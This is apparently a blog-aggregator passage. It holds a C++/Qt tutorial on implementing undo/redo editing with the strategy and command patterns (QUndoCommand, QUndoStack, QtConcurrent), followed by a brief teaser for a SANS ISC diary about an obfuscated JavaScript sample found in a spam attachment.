Ok, first the “design”. We see a lot of behaviors, for something that can do something. The behaviors will perform for that something, the actions it can do. That is obviously the strategy design pattern, then. Right? That’s the one about ducks and wing fly behavior and rocket propelled fly behavior and then the ostrich that has a can’t fly behavior. And undo and redo, that certainly sounds like the command pattern. We also have this neat thing in Qt for that. We’ll use it. We don’t reinvent the wheel. Reinventing the wheel is stupid.

Let’s create the duck. I mean, the thing-editor. As I will use “Thing” for the thing that is being edited. We want copy (sync is sufficient), paste (must be async), and edit (must be async). We could also have insert and delete, but those APIs would be just like edit. And that would make the example only longer. Paste would usually be similar to insert, of course. Except that it can be a combined delete and insert when overwriting content. The command pattern allows you to make such combinations. Not the purpose of this example, though.

Enough explanation for a blog. Let’s start! The ThingEditor is like the flying Duck in strategy. This is going to be more or less the API that we will present to the QML world. It could be your ViewModel, for example (ie. you could let your ThingViewModel subclass ThingEditor).

class ThingEditor : public QObject
{
    Q_OBJECT

    Q_PROPERTY ( ThingEditingBehavior* editingBehavior READ editingBehavior
                 WRITE setEditingBehavior NOTIFY editingBehaviorChanged )
    Q_PROPERTY ( Thing* thing READ thing WRITE setThing NOTIFY thingChanged )

public:
    explicit ThingEditor( QSharedPointer<Thing> &a_thing,
            ThingEditingBehavior *a_editBehavior, QObject *a_parent = nullptr );
    explicit ThingEditor( QObject *a_parent = nullptr );

    Thing* thing() const { return m_thing.data(); }
    virtual void setThing( QSharedPointer<Thing> &a_thing );
    virtual void setThing( Thing *a_thing );

    ThingEditingBehavior* editingBehavior() const { return m_editingBehavior.data(); }
    virtual void setEditingBehavior ( ThingEditingBehavior *a_editingBehavior );

    Q_INVOKABLE virtual void copyCurrentToClipboard ();
    Q_INVOKABLE virtual void editCurrentAsync( const QString &a_value );
    Q_INVOKABLE virtual void pasteCurrentFromClipboardAsync();

signals:
    void editingBehaviorChanged ();
    void thingChanged();
    void editCurrentFinished( EditCurrentCommand *a_command );
    void pasteCurrentFromClipboardFinished( EditCurrentCommand *a_command );

private slots:
    void onEditCurrentFinished();
    void onPasteCurrentFromClipboardFinished();

private:
    QScopedPointer<ThingEditingBehavior> m_editingBehavior;
    QSharedPointer<Thing> m_thing;
    QList<QFutureWatcher<EditCurrentCommand*>*> m_editCurrentFutureWatchers;
    QList<QFutureWatcher<EditCurrentCommand*>*> m_pasteCurrentFromClipboardFutureWatchers;
};

For the implementation of this class, I’ll only provide the non-obvious pieces. I’m sure you can do that setThing, setEditingBehavior and the constructor yourself. I’m also providing it only once, and also only for the EditCurrentCommand. The one about paste is going to be exactly the same.

void ThingEditor::copyCurrentToClipboard ()
{
    m_editingBehavior->copyCurrentToClipboard();
}

void ThingEditor::onEditCurrentFinished()
{
    QFutureWatcher<EditCurrentCommand*> *resultWatcher
            = static_cast<QFutureWatcher<EditCurrentCommand*>*>( sender() );

    emit editCurrentFinished ( resultWatcher->result() );

    if ( m_editCurrentFutureWatchers.contains( resultWatcher ) ) {
        m_editCurrentFutureWatchers.removeAll( resultWatcher );
    }

    delete resultWatcher;
}

void ThingEditor::editCurrentAsync( const QString &a_value )
{
    QFutureWatcher<EditCurrentCommand*> *resultWatcher
            = new QFutureWatcher<EditCurrentCommand*>();

    connect( resultWatcher, &QFutureWatcher<EditCurrentCommand*>::finished,
             this, &ThingEditor::onEditCurrentFinished, Qt::QueuedConnection );

    resultWatcher->setFuture ( m_editingBehavior->editCurrentAsync( a_value ) );

    m_editCurrentFutureWatchers.append ( resultWatcher );
}

For QUndo we’ll need a QUndoCommand. For each undoable action we indeed need to make such a command. No worries, it’s easy. You could add more state and pass it to the constructor. It’s common, for example, to pass Thing, or the ThingEditor or the behavior (this is why I used QSharedPointer for those: as long as your command lives in the stack, you’ll need it to hold a reference to that state).

class EditCurrentCommand : public QUndoCommand
{
public:
    explicit EditCurrentCommand( const QString &a_value, QUndoCommand *a_parent = nullptr )
        : QUndoCommand( a_parent ), m_value ( a_value ) { }

    void redo() Q_DECL_OVERRIDE {
        // Perform action goes here
    }

    void undo() Q_DECL_OVERRIDE {
        // Undo what got performed goes here
    }

private:
    const QString m_value;
};

You can (and probably should) also make this one abstract (and/or a so called pure interface), as you’ll usually want many implementations of this one (one for every kind of editing behavior). This is like the fly behavior in the duck that flies -example of strategy. Note that it leaks the QUndoCommand instances unless you handle them (ie. storing them in a QUndoStack). That in itself is a good reason to call the thing abstract.

class ThingEditingBehavior : public QObject
{
    Q_OBJECT

    Q_PROPERTY ( ThingEditor* editor READ editor WRITE setEditor NOTIFY editorChanged )
    Q_PROPERTY ( Thing* thing READ thing NOTIFY thingChanged )

public:
    explicit ThingEditingBehavior( ThingEditor *a_editor, QObject *a_parent = nullptr )
        : QObject( a_parent ), m_editor ( a_editor ) { }
    explicit ThingEditingBehavior( QObject *a_parent = nullptr )
        : QObject( a_parent ) { }

    ThingEditor* editor() const { return m_editor.data(); }
    virtual void setEditor( ThingEditor *a_editor );
    Thing* thing() const;

    virtual void copyCurrentToClipboard ();
    virtual QFuture<EditCurrentCommand*> editCurrentAsync( const QString &a_value, bool a_exec = true );
    virtual QFuture<EditCurrentCommand*> pasteCurrentFromClipboardAsync( bool a_exec = true );

protected:
    virtual EditCurrentCommand* editCurrentSync( const QString &a_value, bool a_exec = true );
    virtual EditCurrentCommand* pasteCurrentFromClipboardSync( bool a_exec = true );

signals:
    void editorChanged();
    void thingChanged();

private:
    QPointer<ThingEditor> m_editor;
    bool m_synchronous = true;
};

That setEditor, the constructor, etc: these are too obvious to write here. You can do that yourself. Right? Here are the non-obvious ones:

void ThingEditingBehavior::copyCurrentToClipboard ()
{
    // TODO: Implementation of copying the current to clipboard. See QClipboard
}

EditCurrentCommand* ThingEditingBehavior::editCurrentSync( const QString &a_value, bool a_exec )
{
    EditCurrentCommand *ret = new EditCurrentCommand ( a_value );

    if ( a_exec )
        ret->redo();

    return ret;
}

QFuture<EditCurrentCommand*> ThingEditingBehavior::editCurrentAsync( const QString &a_value, bool a_exec )
{
    QFuture<EditCurrentCommand*> resultFuture =
            QtConcurrent::run( QThreadPool::globalInstance(), this,
                               &ThingEditingBehavior::editCurrentSync,
                               a_value, a_exec );

    if ( m_synchronous )
        resultFuture.waitForFinished();

    return resultFuture;
}

And now we can finally make the whole thing undoable by making a undoable editing behavior. That’s like the fly with wings behavior of the duck that flies -example of strategy. The edit with undoable behavior of the Thing editor. Right? I’ll leave a non-undoable editing behavior as an exercise to the reader (ie. just perform redo() on the QUndoCommand, don’t store it in the QUndoStack and immediately delete or cmd->deleteLater() the instance).

Note that if m_synchronous is false, that (all access to) m_undoStack must be (made) thread-safe. The thread-safety is not the purpose of this example, though.

class UndoableThingEditingBehavior : public ThingEditingBehavior
{
    Q_OBJECT
public:
    explicit UndoableThingEditingBehavior( ThingEditor *a_editor, QObject *a_parent = nullptr );

protected:
    EditCurrentCommand* editCurrentSync( const QString &a_value, bool a_exec = true ) Q_DECL_OVERRIDE;
    EditCurrentCommand* pasteCurrentFromClipboardSync( bool a_exec = true ) Q_DECL_OVERRIDE;

private:
    QScopedPointer<QUndoStack> m_undoStack;
};

EditCurrentCommand* UndoableThingEditingBehavior::editCurrentSync( const QString &a_value, bool a_exec )
{
    Q_UNUSED( a_exec )

    EditCurrentCommand *undoable = ThingEditingBehavior::editCurrentSync( a_value, false );
    m_undoStack->push( undoable );

    return undoable;
}

EditCurrentCommand* UndoableThingEditingBehavior::pasteCurrentFromClipboardSync( bool a_exec )
{
    Q_UNUSED( a_exec )

    EditCurrentCommand *undoable = ThingEditingBehavior::pasteCurrentFromClipboardSync( false );
    m_undoStack->push( undoable );

    return undoable;
}

Xavier Mertens: [SANS ISC] Nicely Obfuscated JavaScript Sample

I published the following diary on isc.sans.org: “Nicely Obfuscated JavaScript Sample“.

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. A manual look at the file shows that it is heavily obfuscated and that the payload is encoded in a single variable… [Read more]

[The post [SANS ISC] Nicely Obfuscated JavaScript Sample has been first published on /dev/random]
